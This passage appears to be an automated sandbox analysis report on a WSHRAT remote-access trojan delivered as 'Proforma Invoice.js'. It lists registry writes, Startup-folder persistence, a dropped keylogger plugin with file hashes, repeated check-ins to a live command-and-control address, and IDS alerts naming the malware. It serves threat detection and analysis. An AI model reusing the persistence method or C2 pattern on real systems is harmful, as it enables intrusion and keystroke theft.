wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
EnableFileTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
EnableConsoleTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
FileTracingMask
4294901760
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
ConsoleTracingMask
4294901760
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
MaxFileSize
1048576
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
FileDirectory
%windir%\tracing
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
EnableFileTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
EnableConsoleTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
FileTracingMask
4294901760
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
ConsoleTracingMask
4294901760
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
MaxFileSize
1048576
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS
FileDirectory
%windir%\tracing
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1

Files activity

Executable files
1
Suspicious files
0
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
952
wscript.exe
C:\Users\admin\AppData\Roaming\kl-plugin.exe
executable
MD5: 7099a939fa30d939ccceb2f0597b19ed
SHA256: 272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a
1856
WScript.exe
C:\Users\admin\AppData\Roaming\Proforma Invoice.js
text
MD5: e11c4858c73a9f7fc1e62d56997c596b
SHA256: 22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\lj1fg2om.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\hvw-sfbr.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\vkdxty4d.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\skcan_lm.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\4bht5o7p.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\9hjza_5h.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\qd7a4hu0.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\-zdje6c4.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\7zslasgf.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\y595xfbd.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\3kiyld_d.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\bviiobgn.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\ttpkiy1v.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\-mjpw8iy.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\f-3x_yzf.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\gifwabcm.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\mfqztup4.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\buv5pfyw.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\_wehvz4b.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\xs-rqgoj.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\h_henj_l.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\avvkkhq5.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\sie7ezxx.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\vpurskcv.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\j8o2h-lc.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\ejvk-tsv.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\va-lngrh.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\kxjyfy0s.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\smup9a_n.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\hkapfudc.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\usvvh8zp.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\uqq0de2-.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\brkvqeg4.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\tjkswubp.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\in_jkzyd.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\user.config
xml
MD5: 6adab4c76fc078ab342c1543663b25b8
SHA256: 367d9883f14feff7473dd6936c4378e25c1829de2d5e835e767185b8637e5d3a
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\5xe2ccne.newcfg
––
MD5:  ––
SHA256:  ––
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\kbfsdbuk.newcfg
––
MD5:  ––
SHA256:  ––
952
wscript.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\json[1]
text
MD5: 8d4c7a62ea10405837c345cf422df59e
SHA256: cf8aefe858deb2365484a096a6f5bd60c98c7e3c7857e8a288892d971ed52877
952
wscript.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Proforma Invoice.js
text
MD5: e11c4858c73a9f7fc1e62d56997c596b
SHA256: 22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866
1856
WScript.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Proforma Invoice.js
text
MD5: e11c4858c73a9f7fc1e62d56997c596b
SHA256: 22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866
2236
kl-plugin.exe
C:\Users\admin\AppData\Local\WSHRat_Plugin\kl-plugin.exe_Url_jaxmfvxjr5veege4korvji5hcwi3t2rj\1.1.0.0\w1t8c_da.newcfg
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
13
TCP/UDP connections
15
DNS requests
3
Threats
39

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
952 wscript.exe GET 200 208.95.112.1:80 http://ip-api.com/json/ unknown
text
shared
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious
952 wscript.exe POST –– 79.134.225.103:7775 http://79.134.225.103:7775/is-ready CH
––
––
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
952 wscript.exe 208.95.112.1:80 IBURST –– malicious
952 wscript.exe 79.134.225.103:7775 Andreas Fink trading as Fink Telecom Services CH malicious

DNS requests

Domain IP Reputation
ip-api.com 208.95.112.1
shared
dns.msftncsi.com 131.107.255.255
whitelisted

Threats

PID Process Class Message
952 wscript.exe Potential Corporate Privacy Violation ET POLICY External IP Lookup ip-api.com
952 wscript.exe Potential Corporate Privacy Violation AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm
952 wscript.exe A Network Trojan was detected ET TROJAN WSHRAT CnC Checkin
952 wscript.exe A Network Trojan was detected ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
952 wscript.exe A Network Trojan was detected MALWARE [PTsecurity] KJw0rm/Dunihi.VBS.Worm

Debug output strings

Process Message
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0
kl-plugin.exe 11/08/2019 17:10:31>MouseChange: nCode=0, wParam=WM_MOUSEMOVE, x=13, y=39, mouseData=0, flags=0, dwExtraInfo=0